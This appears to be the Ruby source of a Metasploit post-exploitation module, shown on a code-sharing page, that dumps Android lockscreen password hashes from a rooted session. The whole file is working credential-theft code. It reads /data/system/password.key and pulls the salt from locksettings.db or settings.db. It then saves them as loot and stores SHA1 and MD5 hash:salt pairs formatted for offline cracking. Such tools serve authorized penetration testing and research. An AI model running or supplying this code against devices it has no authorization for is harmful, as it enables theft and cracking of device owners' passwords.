Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
require 'sqlite3'
7
require 'fileutils'
8

9
class MetasploitModule < Msf::Post
10

11
  include Msf::Post::File
12
  include Msf::Post::Android::Priv
13

14
  def initialize(info = {})
15
    super(
16
      update_info(
17
        info,
18
        {
19
          'Name' => 'Android Gather Dump Password Hashes for Android Systems',
20
          'Description' => %q{
21
            Post Module to dump the password hashes for Android System. Root is required.
22
            To perform this operation, two things are needed.  First, a password.key file
23
            is required as this contains the hash but no salt.  Next, a sqlite3 database
24
            is needed (with supporting files) to pull the salt from.  Combined, this
25
            creates the hash we need.  Samsung based devices change the hash slightly.
26
          },
27
          'License' => MSF_LICENSE,
28
          'Author' => ['h00die', 'timwr'],
29
          'SessionTypes' => [ 'meterpreter', 'shell' ],
30
          'Platform' => 'android',
31
          'References' => [
32
            ['URL', 'https://www.pentestpartners.com/security-blog/cracking-android-passwords-a-how-to/'],
33
            ['URL', 'https://hashcat.net/forum/thread-2202.html'],
34
          ]
35
        }
36
      )
37
    )
38
  end
39

40
  def read_store_sql(location)
41
    # we need the .db file, as well as the supporting files .db-shm and .db-wal as they may contain
42
    # the values we are looking for
43
    db_loot_name = ''
44
    file_name = File.basename(location)
45
    ['', '-wal', '-shm'].each do |ext|
46
      l = location + ext
47
      unless file_exist?(l)
48
        next
49
      end
50

51
      f = file_name + ext
52
      data = read_file(l)
53
      if data.blank?
54
        print_error("Unable to read #{l}")
55
        return
56
      end
57
      print_good("Saved #{f} with length #{data.length}")
58

59
      if ext == ''
60
        loot_file = store_loot('SQLite3 DB', 'application/x-sqlite3', session, data, f, 'Android database')
61
        db_loot_name = loot_file
62
        next
63
      end
64

65
      loot_file = store_loot('SQLite3 DB', 'application/binary', session, data, f, 'Android database')
66

67
      # in order for sqlite3 to see the -wal and -shm support files, we have to rename them
68
      # we have to do this since the ext is > 3
69
      # https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/auxiliary/report.rb#L391
70
      new_name = "#{db_loot_name}#{ext}"
71
      FileUtils.mv(loot_file, new_name)
72
    end
73
    SQLite3::Database.new(db_loot_name)
74
  end
75

76
  def run
77
    unless is_root?
78
      fail_with Failure::NoAccess, 'This module requires root permissions.'
79
    end
80

81
    manu = cmd_exec('getprop ro.product.manufacturer')
82

83
    print_status('Attempting to determine unsalted hash.')
84
    key_file = '/data/system/password.key'
85
    unless file_exist?(key_file)
86
      print_error('No password.key file, no password on device.')
87
      return
88
    end
89

90
    hash = read_file(key_file)
91
    if hash.empty?
92
      print_error("Unable to read #{key_file}, and retrieve hash.")
93
      return
94
    end
95
    store_loot('Key', 'plain/text', session, hash, 'password.key', 'Android password hash key')
96
    print_good('Saved password.key')
97

98
    print_status('Attempting to determine salt')
99
    os = cmd_exec('getprop ro.build.version.release')
100
    vprint_status("OS Version: #{os}")
101

102
    locksettings_db = '/data/system/locksettings.db'
103
    locksettings_sql = "select value from locksettings where name='lockscreen.password_salt';"
104
    unless file_exist? locksettings_db
105
      vprint_status("Could not find #{locksettings_db}, using settings.db")
106
      locksettings_db = '/data/data/com.android.providers.settings/databases/settings.db'
107
      locksettings_sql = "select value from secure where name='lockscreen.password_salt';"
108
    end
109

110
    begin
111
      vprint_status("Attempting to load lockscreen db: #{locksettings_db}")
112
      db = read_store_sql(locksettings_db)
113
      if db.nil?
114
        print_error('Unable to load settings.db file.')
115
        return
116
      end
117
      salt = db.execute(locksettings_sql)
118
    rescue SQLite3::SQLException
119
      print_error("Failed to pull salt from database.  Command output: #{salt}")
120
      return
121
    end
122

123
    salt = salt[0][0] # pull string from results Command output: [["5381737017539487883"]] may also be negative.
124

125
    # convert from number string to hex and lowercase
126
    salt = salt.to_i
127
    salt += 2**64 if salt < 0 # deal with negatives
128
    salt = salt.to_s(16)
129
    print_good("Password Salt: #{salt}")
130

131
    sha1 = hash[0...40]
132
    sha1 = "#{sha1}:#{salt}"
133
    print_good("SHA1: #{sha1}")
134
    credential_data = {
135
      # no way to tell them apart w/o knowing one is samsung or not.
136
      jtr_format: manu =~ /samsung/i ? 'android-samsung-sha1' : 'android-sha1',
137
      origin_type: :session,
138
      post_reference_name: refname,
139
      private_type: :nonreplayable_hash,
140
      private_data: sha1,
141
      session_id: session_db_id,
142
      username: '',
143
      workspace_id: myworkspace_id
144
    }
145
    create_credential(credential_data)
146

147
    if hash.length > 40 # devices other than Samsungs have sha1+md5 combined into a single string
148
      md5 = hash[40...72]
149
      md5 = "#{md5}:#{salt}"
150
      print_good("MD5: #{md5}")
151
      credential_data = {
152
        jtr_format: Metasploit::Framework::Hashes.identify_hash(md5),
153
        origin_type: :session,
154
        post_reference_name: refname,
155
        private_type: :nonreplayable_hash,
156
        private_data: md5,
157
        session_id: session_db_id,
158
        username: '',
159
        workspace_id: myworkspace_id
160
      }
161
      create_credential(credential_data)
162
    end
163
  end
164
end
165

166